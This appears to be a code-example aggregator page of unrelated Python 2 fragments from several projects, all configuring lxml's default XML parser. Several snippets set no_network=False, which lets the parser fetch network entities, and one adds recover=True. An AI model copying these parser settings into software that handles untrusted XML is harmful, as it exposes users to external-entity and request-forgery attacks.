STATS['skip'] = int(root.attrib['skip'])
# Skipped tests count as unsuccessful, so 'success' excludes them.
STATS['unsuccess'] = STATS['failure'] + STATS['error'] + STATS['skip']
STATS['success'] = STATS['total'] - STATS['unsuccess']

# One iteration per child element of the root.
for case in root:
    class_name = case.attrib['classname']

    # Screenshot path derived from the case's 'name' attribute.
    screenshot_file = 'logs/artifacts/screenshots/%s.png' % case.attrib['name']
Beispiel #50
0
from opaque_keys.edx.keys import UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey

from xblock.field_data import DictFieldData
from xblock.runtime import DictKeyValueStore, IdGenerator

from . import ModuleStoreReadBase, Location, XML_MODULESTORE_TYPE

from .exceptions import ItemNotFoundError
from .inheritance import compute_inherited_metadata, inheriting_field_data

from xblock.fields import ScopeIds, Reference, ReferenceList, ReferenceValueDict

edx_xml_parser = etree.XMLParser(dtd_validation=False, load_dtd=False, remove_comments=True, remove_blank_text=True)

etree.set_default_parser(edx_xml_parser)

log = logging.getLogger(__name__)


# VS[compat]
# TODO (cpennington): Remove this once all fall 2012 courses have been imported
# into the cms from xml
def clean_out_mako_templating(xml_string):
    """Strip mako-style ``%`` lines from ``xml_string``.

    ``%include`` is first rewritten to ``include``; afterwards every line
    whose first non-whitespace character is ``%`` is blanked. The leading
    whitespace match may span preceding blank lines.
    """
    without_include_marker = xml_string.replace("%include", "include")
    return re.sub(r"(?m)^\s*%.*$", "", without_include_marker)


class ImportSystem(XMLParsingSystem, MakoDescriptorSystem):
    def __init__(
Beispiel #51
0
import logging
import time
import sha
import urllib
import os.path
import shutil
from lxml import etree

from django.conf import settings
from django.db.models import get_model

# Prevent: XMLSyntaxError: Attempt to load network entity
etree.set_default_parser(etree.XMLParser(no_network=False, recover=True))

logger = logging.getLogger('gsm')


def get_object_from_url(url):
    """Return the ``GsmEntity`` addressed by the path segments of ``url``.

    Segments are collected from the first one that is a known sport slug:
    a segment is kept when it is a sport slug, or when one or two segments
    have been kept already. The first three kept segments are used as sport
    slug, tag and gsm id for the lookup. ``IndexError`` is raised when fewer
    than three segments were kept.
    """
    Sport = get_model('gsm', 'sport')
    GsmEntity = get_model('gsm', 'gsmentity')
    sports = Sport.objects.all().values_list('slug', flat=True)

    data = []
    for part in url.split('/'):
        if part in sports or 1 <= len(data) < 3:
            data.append(part)

    return GsmEntity.objects.get(sport__slug=data[0],
                                 tag=data[1],
                                 gsm_id=data[2])
Beispiel #52
0
from lxml import etree

from oaipmh.metadata import MetadataRegistry

from django.utils.datastructures import MultiValueDict
from django.contrib.auth.models import User

from libros.bookreader.models import Book, Page, Annotation, Link, Transcription
from libros.bookreader.harvesting.metadata import metadata_registry



log = getLogger('bookreader.harvesting.book')

etree.set_default_parser(etree.XMLParser(dtd_validation=False, load_dtd=False,
                                         no_network=False))

class BookHarvester(object):
    def __init__(self, book, metadata_registry=metadata_registry, bundle_prefix='ore'):
        """Bind the harvester to ``book`` and open its repository connection.

        ``book`` must be a ``Book`` and ``metadata_registry`` a
        ``MetadataRegistry`` (both checked with ``assert``). The connection is
        obtained from the repository of the book's collection.
        """
        assert isinstance(book, Book)
        assert isinstance(metadata_registry, MetadataRegistry)

        self.book = book
        source_repository = book.collection.repository
        self.repository = source_repository.connection(metadata_registry=metadata_registry)
        self._bundle_prefix = bundle_prefix
    
    def _set_additional_metadata(self, field, value):
        """ If a value does not equate to false, set the field in the 
        additional_metadata multi-valued dictionary"""
        if not value:
            return
Beispiel #53
0
import logging
from lxml import etree

from django.core.management.base import NoArgsCommand
from django.conf import settings

from music.models import *

etree.set_default_parser(etree.XMLParser(no_network=False))

letters = [chr(i) for i in xrange(ord('a'), ord('z')+1)]
letters = ['a']

class Command(NoArgsCommand):
    help = "Synchronise lastfm artist, track and album database."
   
    def handle_noargs(self, **options):
        logging.basicConfig(level=logging.DEBUG, format="%(message)s")
        logging.info("-" * 72)

        for letter in letters:
            total_pages = None

            url = 'http://ws.audioscrobbler.com/2.0/?api_key=%s&method=%s&artist=%s&page=%s' % (
                settings.LASTFM_API_KEY,
                'artist.search',
                letter,
                1
            )

            tree = etree.parse(url)